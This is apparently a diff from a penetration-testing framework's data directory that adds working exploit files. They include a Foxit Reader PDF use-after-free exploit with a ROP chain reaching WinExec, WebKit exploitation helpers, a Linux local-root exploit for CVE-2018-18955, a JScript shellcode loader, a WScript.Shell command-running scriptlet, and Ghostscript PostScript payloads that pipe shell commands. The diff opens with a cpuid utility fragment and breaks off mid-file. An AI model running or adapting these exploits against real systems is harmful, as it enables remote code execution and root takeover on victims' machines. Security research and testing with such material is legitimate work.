||||
|
||||
cpuid(1);
|
||||
fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
|
||||
b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
|
||||
fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
|
||||
b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
|
||||
|
||||
fprintf(stdout, "FLAGS:");
|
||||
for (i=0 ; i<32 ; i++)
|
||||
if (edx & (1 << i))
|
||||
fprintf(stdout, " %s", featureinfo[i]);
|
||||
|
||||
for (i=0 ; i<32 ; i++)
|
||||
if (ecx & (1 << i))
|
||||
fprintf(stdout, " %s", extendinfo[i]);
|
||||
|
||||
fprintf(stdout, "\n");
|
||||
fflush(stdout);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,16 @@
|
|||
<?xml version='1.0'?>
|
||||
<package>
|
||||
<component id='giffile'>
|
||||
<registration
|
||||
description='Dummy'
|
||||
progid='giffile'
|
||||
version='1.00'
|
||||
remotable='True'>
|
||||
</registration>
|
||||
<script language='JScript'>
|
||||
<![CDATA[
|
||||
var q = new ActiveXObject('Wscript.Shell').Run("SCRIPTED_COMMAND");
|
||||
]]>
|
||||
</script>
|
||||
</component>
|
||||
</package>
|
|
@ -0,0 +1,182 @@
|
|||
//
|
||||
// Tiny module that provides big (64bit) integers.
|
||||
//
|
||||
// Copyright (c) 2016 Samuel Groß
|
||||
//
|
||||
// Requires utils.js
|
||||
//
|
||||
|
||||
// Datatype to represent 64-bit integers.
|
||||
//
|
||||
// Internally, the integer is stored as a Uint8Array in little endian byte order.
|
||||
function Int64(v) {
|
||||
// The underlying byte array.
|
||||
var bytes = new Uint8Array(8);
|
||||
|
||||
switch (typeof v) {
|
||||
case 'number':
|
||||
v = '0x' + Math.floor(v).toString(16);
|
||||
case 'string':
|
||||
if (v.startsWith('0x'))
|
||||
v = v.substr(2);
|
||||
if (v.length % 2 == 1)
|
||||
v = '0' + v;
|
||||
|
||||
var bigEndian = unhexlify(v, 8);
|
||||
bytes.set(Array.from(bigEndian).reverse());
|
||||
break;
|
||||
case 'object':
|
||||
if (v instanceof Int64) {
|
||||
bytes.set(v.bytes());
|
||||
} else {
|
||||
if (v.length != 8)
|
||||
throw TypeError("Array must have excactly 8 elements.");
|
||||
bytes.set(v);
|
||||
}
|
||||
break;
|
||||
case 'undefined':
|
||||
break;
|
||||
default:
|
||||
throw TypeError("Int64 constructor requires an argument.");
|
||||
}
|
||||
|
||||
// Return a double whith the same underlying bit representation.
|
||||
this.asDouble = function() {
|
||||
// Check for NaN
|
||||
if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
|
||||
throw new RangeError("Integer can not be represented by a double");
|
||||
|
||||
return Struct.unpack(Struct.float64, bytes);
|
||||
};
|
||||
|
||||
// Return a javascript value with the same underlying bit representation.
|
||||
// This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
|
||||
// due to double conversion constraints.
|
||||
this.asJSValue = function() {
|
||||
if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
|
||||
throw new RangeError("Integer can not be represented by a JSValue");
|
||||
|
||||
// For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
|
||||
this.assignSub(this, 0x1000000000000);
|
||||
var res = Struct.unpack(Struct.float64, bytes);
|
||||
this.assignAdd(this, 0x1000000000000);
|
||||
|
||||
return res;
|
||||
};
|
||||
|
||||
// Return the underlying bytes of this number as array.
|
||||
this.bytes = function() {
|
||||
return Array.from(bytes);
|
||||
};
|
||||
|
||||
// Return the byte at the given index.
|
||||
this.byteAt = function(i) {
|
||||
return bytes[i];
|
||||
};
|
||||
|
||||
// Return the value of this number as unsigned hex string.
|
||||
this.toString = function() {
|
||||
return '0x' + hexlify(Array.from(bytes).reverse());
|
||||
};
|
||||
|
||||
// Basic arithmetic.
|
||||
// These functions assign the result of the computation to their 'this' object.
|
||||
|
||||
// Decorator for Int64 instance operations. Takes care
|
||||
// of converting arguments to Int64 instances if required.
|
||||
function operation(f, nargs) {
|
||||
return function() {
|
||||
if (arguments.length != nargs)
|
||||
throw Error("Not enough arguments for function " + f.name);
|
||||
for (var i = 0; i < arguments.length; i++)
|
||||
if (!(arguments[i] instanceof Int64))
|
||||
arguments[i] = new Int64(arguments[i]);
|
||||
return f.apply(this, arguments);
|
||||
};
|
||||
}
|
||||
|
||||
// this = -n (two's complement)
|
||||
this.assignNeg = operation(function neg(n) {
|
||||
for (var i = 0; i < 8; i++)
|
||||
bytes[i] = ~n.byteAt(i);
|
||||
|
||||
return this.assignAdd(this, Int64.One);
|
||||
}, 1);
|
||||
|
||||
// this = a + b
|
||||
this.assignAdd = operation(function add(a, b) {
|
||||
var carry = 0;
|
||||
for (var i = 0; i < 8; i++) {
|
||||
var cur = a.byteAt(i) + b.byteAt(i) + carry;
|
||||
carry = cur > 0xff | 0;
|
||||
bytes[i] = cur;
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a - b
|
||||
this.assignSub = operation(function sub(a, b) {
|
||||
var carry = 0;
|
||||
for (var i = 0; i < 8; i++) {
|
||||
var cur = a.byteAt(i) - b.byteAt(i) - carry;
|
||||
carry = cur < 0 | 0;
|
||||
bytes[i] = cur;
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a ^ b
|
||||
this.assignXor = operation(function sub(a, b) {
|
||||
for (var i = 0; i < 8; i++) {
|
||||
bytes[i] = a.byteAt(i) ^ b.byteAt(i);
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a & b
|
||||
this.assignAnd = operation(function sub(a, b) {
|
||||
for (var i = 0; i < 8; i++) {
|
||||
bytes[i] = a.byteAt(i) & b.byteAt(i);
|
||||
}
|
||||
return this;
|
||||
}, 2)
|
||||
}
|
||||
|
||||
// Constructs a new Int64 instance with the same bit representation as the provided double.
|
||||
Int64.fromDouble = function(d) {
|
||||
var bytes = Struct.pack(Struct.float64, d);
|
||||
return new Int64(bytes);
|
||||
};
|
||||
|
||||
// Convenience functions. These allocate a new Int64 to hold the result.
|
||||
|
||||
// Return -n (two's complement)
|
||||
function Neg(n) {
|
||||
return (new Int64()).assignNeg(n);
|
||||
}
|
||||
|
||||
// Return a + b
|
||||
function Add(a, b) {
|
||||
return (new Int64()).assignAdd(a, b);
|
||||
}
|
||||
|
||||
// Return a - b
|
||||
function Sub(a, b) {
|
||||
return (new Int64()).assignSub(a, b);
|
||||
}
|
||||
|
||||
// Return a ^ b
|
||||
function Xor(a, b) {
|
||||
return (new Int64()).assignXor(a, b);
|
||||
}
|
||||
|
||||
// Return a & b
|
||||
function And(a, b) {
|
||||
return (new Int64()).assignAnd(a, b);
|
||||
}
|
||||
|
||||
// Some commonly used numbers.
|
||||
Int64.Zero = new Int64(0);
|
||||
Int64.One = new Int64(1);
|
||||
|
||||
// That's all the arithmetic we need for exploiting WebKit.. :)
|
Binary file not shown.
|
@ -0,0 +1,78 @@
|
|||
//
|
||||
// Utility functions.
|
||||
//
|
||||
// Copyright (c) 2016 Samuel Groß
|
||||
//
|
||||
|
||||
// Return the hexadecimal representation of the given byte.
|
||||
function hex(b) {
|
||||
return ('0' + b.toString(16)).substr(-2);
|
||||
}
|
||||
|
||||
// Return the hexadecimal representation of the given byte array.
|
||||
function hexlify(bytes) {
|
||||
var res = [];
|
||||
for (var i = 0; i < bytes.length; i++)
|
||||
res.push(hex(bytes[i]));
|
||||
|
||||
return res.join('');
|
||||
}
|
||||
|
||||
// Return the binary data represented by the given hexdecimal string.
|
||||
function unhexlify(hexstr) {
|
||||
if (hexstr.length % 2 == 1)
|
||||
throw new TypeError("Invalid hex string");
|
||||
|
||||
var bytes = new Uint8Array(hexstr.length / 2);
|
||||
for (var i = 0; i < hexstr.length; i += 2)
|
||||
bytes[i/2] = parseInt(hexstr.substr(i, 2), 16);
|
||||
|
||||
return bytes;
|
||||
}
|
||||
|
||||
function hexdump(data) {
|
||||
if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
|
||||
data = Array.from(data);
|
||||
|
||||
var lines = [];
|
||||
for (var i = 0; i < data.length; i += 16) {
|
||||
var chunk = data.slice(i, i+16);
|
||||
var parts = chunk.map(hex);
|
||||
if (parts.length > 8)
|
||||
parts.splice(8, 0, ' ');
|
||||
lines.push(parts.join(' '));
|
||||
}
|
||||
|
||||
return lines.join('\n');
|
||||
}
|
||||
|
||||
// Simplified version of the similarly named python module.
|
||||
var Struct = (function() {
|
||||
// Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
|
||||
var buffer = new ArrayBuffer(8);
|
||||
var byteView = new Uint8Array(buffer);
|
||||
var uint32View = new Uint32Array(buffer);
|
||||
var float64View = new Float64Array(buffer);
|
||||
|
||||
return {
|
||||
pack: function(type, value) {
|
||||
var view = type; // See below
|
||||
view[0] = value;
|
||||
return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT);
|
||||
},
|
||||
|
||||
unpack: function(type, bytes) {
|
||||
if (bytes.length !== type.BYTES_PER_ELEMENT)
|
||||
throw Error("Invalid bytearray");
|
||||
|
||||
var view = type; // See below
|
||||
byteView.set(bytes);
|
||||
return view[0];
|
||||
},
|
||||
|
||||
// Available types.
|
||||
int8: byteView,
|
||||
int32: uint32View,
|
||||
float64: float64View
|
||||
};
|
||||
})();
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,125 @@
|
|||
%PDF
|
||||
1 0 obj
|
||||
<</Pages 1 0 R /OpenAction 2 0 R>>
|
||||
2 0 obj
|
||||
<</S /JavaScript /JS (
|
||||
|
||||
var heap_ptr = 0;
|
||||
var foxit_base = 0;
|
||||
var pwn_array = [];
|
||||
|
||||
function prepare_heap(size){
|
||||
var arr = new Array(size);
|
||||
for(var i = 0; i < size; i++){
|
||||
arr[i] = this.addAnnot({type: "Text"});;
|
||||
if (typeof arr[i] == "object"){
|
||||
arr[i].destroy();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function gc() {
|
||||
const maxMallocBytes = 128 * 0x100000;
|
||||
for (var i = 0; i < 3; i++) {
|
||||
var x = new ArrayBuffer(maxMallocBytes);
|
||||
}
|
||||
}
|
||||
|
||||
function alloc_at_leak(){
|
||||
for (var i = 0; i < 0x64; i++){
|
||||
pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
|
||||
}
|
||||
}
|
||||
|
||||
function control_memory(){
|
||||
for (var i = 0; i < 0x64; i++){
|
||||
for (var j = 0; j < pwn_array[i].length; j++){
|
||||
pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function leak_vtable(){
|
||||
var a = this.addAnnot({type: "Text"});
|
||||
|
||||
a.destroy();
|
||||
gc();
|
||||
|
||||
prepare_heap(0x400);
|
||||
var test = new ArrayBuffer(0x60);
|
||||
var stolen = new Int32Array(test);
|
||||
|
||||
var leaked = stolen[0] & 0xffff0000;
|
||||
foxit_base = leaked - 0x01f50000;
|
||||
}
|
||||
|
||||
function leak_heap_chunk(){
|
||||
var a = this.addAnnot({type: "Text"});
|
||||
a.destroy();
|
||||
prepare_heap(0x400);
|
||||
|
||||
var test = new ArrayBuffer(0x60);
|
||||
var stolen = new Int32Array(test);
|
||||
|
||||
alloc_at_leak();
|
||||
heap_ptr = stolen[1];
|
||||
}
|
||||
|
||||
function reclaim(){
|
||||
var arr = new Array(0x10);
|
||||
for (var i = 0; i < arr.length; i++) {
|
||||
arr[i] = new ArrayBuffer(0x60);
|
||||
var rop = new Int32Array(arr[i]);
|
||||
|
||||
rop[0x00] = heap_ptr; // pointer to our stack pivot from the TypedArray leak
|
||||
rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
|
||||
rop[0x02] = 0x72727272; // junk
|
||||
rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret
|
||||
rop[0x04] = 0xffffffff; // ret of WinExec
|
||||
rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
|
||||
rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
|
||||
rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
|
||||
rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
|
||||
rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
|
||||
rop[0x0a] = foxit_base + 0x0041c6ca; // ret
|
||||
rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
|
||||
<%= rop %>
|
||||
rop[0x17] = 0x00000000; // adios, amigo
|
||||
}
|
||||
}
|
||||
|
||||
function trigger_uaf(){
|
||||
var that = this;
|
||||
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
|
||||
var arr = [1];
|
||||
Object.defineProperties(arr,{
|
||||
"0":{
|
||||
get: function () {
|
||||
|
||||
that.getAnnot(0, "uaf").destroy();
|
||||
|
||||
reclaim();
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
});
|
||||
|
||||
a.point = arr;
|
||||
}
|
||||
|
||||
function main(){
|
||||
leak_heap_chunk();
|
||||
leak_vtable();
|
||||
control_memory();
|
||||
trigger_uaf();
|
||||
}
|
||||
|
||||
if (app.platform == "WIN"){
|
||||
if (app.isFoxit == "Foxit Reader"){
|
||||
if (app.appFoxitVersion == "9.0.1.1049"){
|
||||
main();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
)>> trailer <</Root 1 0 R>>
|
|
@ -0,0 +1,52 @@
|
|||
// subshell.c
|
||||
// author: Jann Horn
|
||||
// source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
|
||||
|
||||
#define _GNU_SOURCE
|
||||
#include <unistd.h>
|
||||
#include <grp.h>
|
||||
#include <err.h>
|
||||
#include <stdio.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/un.h>
|
||||
#include <sched.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
int main() {
|
||||
int sync_pipe[2];
|
||||
char dummy;
|
||||
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe");
|
||||
|
||||
pid_t child = fork();
|
||||
if (child == -1) err(1, "fork");
|
||||
if (child == 0) {
|
||||
close(sync_pipe[1]);
|
||||
if (unshare(CLONE_NEWUSER)) err(1, "unshare userns");
|
||||
if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock");
|
||||
|
||||
if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock");
|
||||
execl("/bin/bash", "bash", NULL);
|
||||
err(1, "exec");
|
||||
}
|
||||
|
||||
close(sync_pipe[0]);
|
||||
if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock");
|
||||
char pbuf[100];
|
||||
sprintf(pbuf, "/proc/%d", (int)child);
|
||||
if (chdir(pbuf)) err(1, "chdir");
|
||||
const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
|
||||
int uid_map = open("uid_map", O_WRONLY);
|
||||
if (uid_map == -1) err(1, "open uid map");
|
||||
if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map");
|
||||
close(uid_map);
|
||||
int gid_map = open("gid_map", O_WRONLY);
|
||||
if (gid_map == -1) err(1, "open gid map");
|
||||
if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map");
|
||||
close(gid_map);
|
||||
if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock");
|
||||
|
||||
int status;
|
||||
if (wait(&status) != child) err(1, "wait");
|
||||
return 0;
|
||||
}
|
Binary file not shown.
|
@ -0,0 +1,272 @@
|
|||
// subuid_shell.c - Linux local root exploit for CVE-2018-18955
|
||||
// Exploits broken uid/gid mapping in nested user namespaces.
|
||||
// ---
|
||||
// Mostly stolen from Jann Horn's exploit:
|
||||
// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
|
||||
// Some code stolen from Xairy's exploits:
|
||||
// - https://github.com/xairy/kernel-exploits
|
||||
// ---
|
||||
// <bcoles@gmail.com>
|
||||
// - added auto subordinate id mapping
|
||||
// https://github.com/bcoles/kernel-exploits/tree/cve-2018-18955
|
||||
|
||||
#define _GNU_SOURCE
|
||||
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <grp.h>
|
||||
#include <pwd.h>
|
||||
#include <sched.h>
|
||||
#include <stdio.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/un.h>
|
||||
#include <sys/wait.h>
|
||||
#include <stdarg.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <signal.h>
|
||||
#include <sys/prctl.h>
|
||||
|
||||
#define DEBUG
|
||||
|
||||
#ifdef DEBUG
|
||||
# define dprintf printf
|
||||
#else
|
||||
# define dprintf
|
||||
#endif
|
||||
|
||||
char* SUBSHELL = "./subshell";
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * File I/O * * * * * * * * * * * * * * * * *
|
||||
|
||||
#define CHUNK_SIZE 1024
|
||||
|
||||
int read_file(const char* file, char* buffer, int max_length) {
|
||||
int f = open(file, O_RDONLY);
|
||||
if (f == -1)
|
||||
return -1;
|
||||
int bytes_read = 0;
|
||||
while (1) {
|
||||
int bytes_to_read = CHUNK_SIZE;
|
||||
if (bytes_to_read > max_length - bytes_read)
|
||||
bytes_to_read = max_length - bytes_read;
|
||||
int rv = read(f, &buffer[bytes_read], bytes_to_read);
|
||||
if (rv == -1)
|
||||
return -1;
|
||||
bytes_read += rv;
|
||||
if (rv == 0)
|
||||
return bytes_read;
|
||||
}
|
||||
}
|
||||
|
||||
static int write_file(const char* file, const char* what, ...) {
|
||||
char buf[1024];
|
||||
va_list args;
|
||||
va_start(args, what);
|
||||
vsnprintf(buf, sizeof(buf), what, args);
|
||||
va_end(args);
|
||||
buf[sizeof(buf) - 1] = 0;
|
||||
int len = strlen(buf);
|
||||
|
||||
int fd = open(file, O_WRONLY | O_CLOEXEC);
|
||||
if (fd == -1)
|
||||
return -1;
|
||||
if (write(fd, buf, len) != len) {
|
||||
close(fd);
|
||||
return -1;
|
||||
}
|
||||
close(fd);
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * Map * * * * * * * * * * * * * * * * *
|
||||
|
||||
int get_subuid(char* output, int max_length) {
|
||||
char buffer[1024];
|
||||
char* path = "/etc/subuid";
|
||||
int length = read_file(path, &buffer[0], sizeof(buffer));
|
||||
if (length == -1)
|
||||
return -1;
|
||||
|
||||
int real_uid = getuid();
|
||||
struct passwd *u = getpwuid(real_uid);
|
||||
|
||||
char needle[1024];
|
||||
sprintf(needle, "%s:", u->pw_name);
|
||||
int needle_length = strlen(needle);
|
||||
char* found = memmem(&buffer[0], length, needle, needle_length);
|
||||
if (found == NULL)
|
||||
return -1;
|
||||
|
||||
int i;
|
||||
for (i = 0; found[needle_length + i] != ':'; i++) {
|
||||
if (i >= max_length)
|
||||
return -1;
|
||||
if ((found - &buffer[0]) + needle_length + i >= length)
|
||||
return -1;
|
||||
output[i] = found[needle_length + i];
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int get_subgid(char* output, int max_length) {
|
||||
char buffer[1024];
|
||||
char* path = "/etc/subgid";
|
||||
int length = read_file(path, &buffer[0], sizeof(buffer));
|
||||
if (length == -1)
|
||||
return -1;
|
||||
|
||||
int real_gid = getgid();
|
||||
struct group *g = getgrgid(real_gid);
|
||||
|
||||
char needle[1024];
|
||||
sprintf(needle, "%s:", g->gr_name);
|
||||
int needle_length = strlen(needle);
|
||||
char* found = memmem(&buffer[0], length, needle, needle_length);
|
||||
if (found == NULL)
|
||||
return -1;
|
||||
|
||||
int i;
|
||||
for (i = 0; found[needle_length + i] != ':'; i++) {
|
||||
if (i >= max_length)
|
||||
return -1;
|
||||
if ((found - &buffer[0]) + needle_length + i >= length)
|
||||
return -1;
|
||||
output[i] = found[needle_length + i];
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
|
||||
|
||||
int main(int argc, char** argv) {
|
||||
if (argc > 1) SUBSHELL = argv[1];
|
||||
|
||||
dprintf("[.] starting\n");
|
||||
|
||||
dprintf("[.] setting up namespace\n");
|
||||
|
||||
int sync_pipe[2];
|
||||
char dummy;
|
||||
|
||||
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) {
|
||||
dprintf("[-] pipe\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
pid_t child = fork();
|
||||
|
||||
if (child == -1) {
|
||||
dprintf("[-] fork");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (child == 0) {
|
||||
prctl(PR_SET_PDEATHSIG, SIGKILL);
|
||||
close(sync_pipe[1]);
|
||||
|
||||
if (unshare(CLONE_NEWUSER) != 0) {
|
||||
dprintf("[-] unshare(CLONE_NEWUSER)\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (unshare(CLONE_NEWNET) != 0) {
|
||||
dprintf("[-] unshare(CLONE_NEWNET)\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (write(sync_pipe[0], "X", 1) != 1) {
|
||||
dprintf("write to sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (read(sync_pipe[0], &dummy, 1) != 1) {
|
||||
dprintf("[-] read from sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (setgid(0)) {
|
||||
dprintf("[-] setgid");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (setuid(0)) {
|
||||
printf("[-] setuid");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
execl(SUBSHELL, "", NULL);
|
||||
|
||||
dprintf("[-] executing subshell failed\n");
|
||||
}
|
||||
|
||||
close(sync_pipe[0]);
|
||||
|
||||
if (read(sync_pipe[1], &dummy, 1) != 1) {
|
||||
dprintf("[-] read from sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
char path[256];
|
||||
sprintf(path, "/proc/%d/setgroups", (int)child);
|
||||
|
||||
if (write_file(path, "deny") == -1) {
|
||||
dprintf("[-] denying setgroups failed\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[~] done, namespace sandbox set up\n");
|
||||
|
||||
dprintf("[.] mapping subordinate ids\n");
|
||||
char subuid[64];
|
||||
char subgid[64];
|
||||
|
||||
if (get_subuid(&subuid[0], sizeof(subuid))) {
|
||||
dprintf("[-] couldn't find subuid map in /etc/subuid\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (get_subgid(&subgid[0], sizeof(subgid))) {
|
||||
dprintf("[-] couldn't find subgid map in /etc/subgid\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[.] subuid: %s\n", subuid);
|
||||
dprintf("[.] subgid: %s\n", subgid);
|
||||
|
||||
char cmd[256];
|
||||
|
||||
sprintf(cmd, "newuidmap %d 0 %s 1000", (int)child, subuid);
|
||||
if (system(cmd)) {
|
||||
dprintf("[-] newuidmap failed");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
sprintf(cmd, "newgidmap %d 0 %s 1000", (int)child, subgid);
|
||||
if (system(cmd)) {
|
||||
dprintf("[-] newgidmap failed");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[~] done, mapped subordinate ids\n");
|
||||
|
||||
dprintf("[.] executing subshell\n");
|
||||
|
||||
if (write(sync_pipe[1], "X", 1) != 1) {
|
||||
dprintf("[-] write to sock");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
int status;
|
||||
if (wait(&status) != child) {
|
||||
dprintf("[-] wait");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
Binary file not shown.
|
@ -0,0 +1,77 @@
|
|||
import System;
|
||||
import System.Runtime.InteropServices;
|
||||
import System.Reflection;
|
||||
import System.Reflection.Emit;
|
||||
import System.Runtime;
|
||||
import System.Text;
|
||||
|
||||
function InvokeWin32(dllName:String, returnType:Type,
|
||||
methodName:String, parameterTypes:Type[], parameters:Object[])
|
||||
{
|
||||
// Begin to build the dynamic assembly
|
||||
var domain = AppDomain.CurrentDomain;
|
||||
var name = new System.Reflection.AssemblyName('PInvokeAssembly');
|
||||
var assembly = domain.DefineDynamicAssembly(name, AssemblyBuilderAccess.Run);
|
||||
var module = assembly.DefineDynamicModule('PInvokeModule');
|
||||
var type = module.DefineType('PInvokeType',TypeAttributes.Public + TypeAttributes.BeforeFieldInit);
|
||||
|
||||
// Define the actual P/Invoke method
|
||||
var method = type.DefineMethod(methodName, MethodAttributes.Public + MethodAttributes.HideBySig + MethodAttributes.Static + MethodAttributes.PinvokeImpl, returnType, parameterTypes);
|
||||
|
||||
// Apply the P/Invoke constructor
|
||||
var ctor = System.Runtime.InteropServices.DllImportAttribute.GetConstructor([Type.GetType("System.String")]);
|
||||
var attr = new System.Reflection.Emit.CustomAttributeBuilder(ctor, [dllName]);
|
||||
method.SetCustomAttribute(attr);
|
||||
|
||||
// Create the temporary type, and invoke the method.
|
||||
var realType = type.CreateType();
|
||||
return realType.InvokeMember(methodName, BindingFlags.Public + BindingFlags.Static + BindingFlags.InvokeMethod, null, null, parameters);
|
||||
}
|
||||
|
||||
function VirtualAlloc( lpStartAddr:UInt32, size:UInt32, flAllocationType:UInt32, flProtect:UInt32)
|
||||
{
|
||||
var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32")];
|
||||
var parameters:Object[] = [lpStartAddr, size, flAllocationType, flProtect];
|
||||
|
||||
return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "VirtualAlloc", parameterTypes, parameters );
|
||||
}
|
||||
|
||||
function CreateThread( lpThreadAttributes:UInt32, dwStackSize:UInt32, lpStartAddress:IntPtr, param:IntPtr, dwCreationFlags:UInt32, lpThreadId:UInt32)
|
||||
{
|
||||
var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.IntPtr"),Type.GetType("System.IntPtr"), Type.GetType("System.UInt32"), Type.GetType("System.UInt32") ];
|
||||
var parameters:Object[] = [lpThreadAttributes, dwStackSize, lpStartAddress, param, dwCreationFlags, lpThreadId ];
|
||||
|
||||
return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "CreateThread", parameterTypes, parameters );
|
||||
}
|
||||
|
||||
function WaitForSingleObject( handle:IntPtr, dwMiliseconds:UInt32)
|
||||
{
|
||||
var parameterTypes:Type[] = [Type.GetType("System.IntPtr"),Type.GetType("System.UInt32")];
|
||||
var parameters:Object[] = [handle, dwMiliseconds ];
|
||||
|
||||
return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "WaitForSingleObject", parameterTypes, parameters );
|
||||
}
|
||||
|
||||
function ShellCodeExec()
|
||||
{
|
||||
var MEM_COMMIT:uint = 0x1000;
|
||||
var PAGE_EXECUTE_READWRITE:uint = 0x40;
|
||||
|
||||
var shellcodestr:String = '<%= file_payload %>'
|
||||
var shellcode:Byte[] = System.Convert.FromBase64String(shellcodestr);
|
||||
var funcAddr:IntPtr = VirtualAlloc(0, UInt32(shellcode.Length),MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
|
||||
|
||||
Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);
|
||||
var hThread:IntPtr = IntPtr.Zero;
|
||||
var threadId:UInt32 = 0;
|
||||
// prepare data
|
||||
var pinfo:IntPtr = IntPtr.Zero;
|
||||
// execute native code
|
||||
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, threadId);
|
||||
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
||||
|
||||
}
|
||||
try{
|
||||
ShellCodeExec();
|
||||
}catch(e){}
|
|
@ -0,0 +1,9 @@
|
|||
%!PS
|
||||
userdict /setpagedevice undef
|
||||
a0
|
||||
currentpagedevice /HWResolution get 0 (metasploit) put
|
||||
{ grestore } stopped pop
|
||||
(ppmraw) selectdevice
|
||||
mark /OutputFile (%pipe%echo vulnerable > /dev/tty) currentdevice putdeviceprops
|
||||
{ showpage } stopped pop
|
||||
quit
|
|
@ -0,0 +1,81 @@
|
|||
%!PS
|
||||
% This is ghostscript bug #699687 (split out from bug #699654)
|
||||
|
||||
% ImageMagick define setpagedevice, just remove their definition. This doesn't
|
||||
% do anything if not using ImageMagick.
|
||||
userdict /setpagedevice undef
|
||||
|
||||
% function to check if we're on Linux or Windows
|
||||
/iswindows {
|
||||
% Just checking if paths contain drive
|
||||
null (w) .tempfile closefile 1 get 16#3A eq
|
||||
} def
|
||||
|
||||
% just select a papersize to initialize page device
|
||||
a0
|
||||
|
||||
% The bug is that if you can make grestore or restore fail non-fatally,
|
||||
% LockSafetyParams isn't restored properly. grestore will fail if you set crazy
|
||||
